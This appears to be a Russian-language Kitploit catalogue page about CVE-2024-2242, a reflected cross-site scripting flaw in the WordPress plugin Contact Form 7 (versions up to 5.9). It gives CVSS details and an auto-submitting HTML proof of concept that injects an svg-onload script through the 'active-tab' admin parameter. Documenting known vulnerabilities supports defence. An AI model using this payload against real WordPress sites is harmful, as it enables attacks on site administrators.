Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-2242 — Contact Form 7 <= 5.9 - Отражённый межсайтовый скриптинг | Kitploit
Инструменты/GitHubGitHub/randomrobbiebf/cve-2024-2242
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubrandomrobbiebf/cve-2024-2242

CVE-2024-2242

Contact Form 7 <= 5.9 - Отражённый межсайтовый скриптинг

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-2242

Contact Form 7 <= 5.9 - Отражённая межсайтовая скриптовая атака (XSS)

Описание

Плагин Contact Form 7 для WordPress уязвим к отражённой межсайтовой скриптовой атаке через параметр 'active-tab' во всех версиях до 5.9 включительно из-за недостаточной санитизации входных данных и экранирования вывода. Это позволяет неавторизованным злоумышленникам внедрять произвольные веб-скрипты на страницах, которые выполняются, если им удаётся обманом заставить пользователя выполнить действие, например, перейти по ссылке.

root@kitploit:~
CVSS: 6.1
Impact: 2.7
Vector: network
User Interaction: required
Privileges Required: none
Published: 2024-03-13
Updated: 2024-03-13

POC

Вам нужно знать значение post id формы, иначе при клике администратора по ссылке она не сработает. В целом требуемые привилегии должны быть 'H', так как нужно, чтобы администратор перешёл по ссылке.

root@kitploit:~
<html>

  <body>
    <form action="http://kubernetes.docker.internal/wp-admin/admin.php">
      <input type="hidden" name="page" value="wpcf7" />
      <input type="hidden" name="post" value="4478" />
      <input type="hidden" name="active&#45;tab" value="&apos;&quot;&gt;&lt;svg&#47;onload&#61;prompt&#40;7&#41;&#59;&gt;&#123;&#123;7&#42;7&#125;&#125;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
Скачать инструмент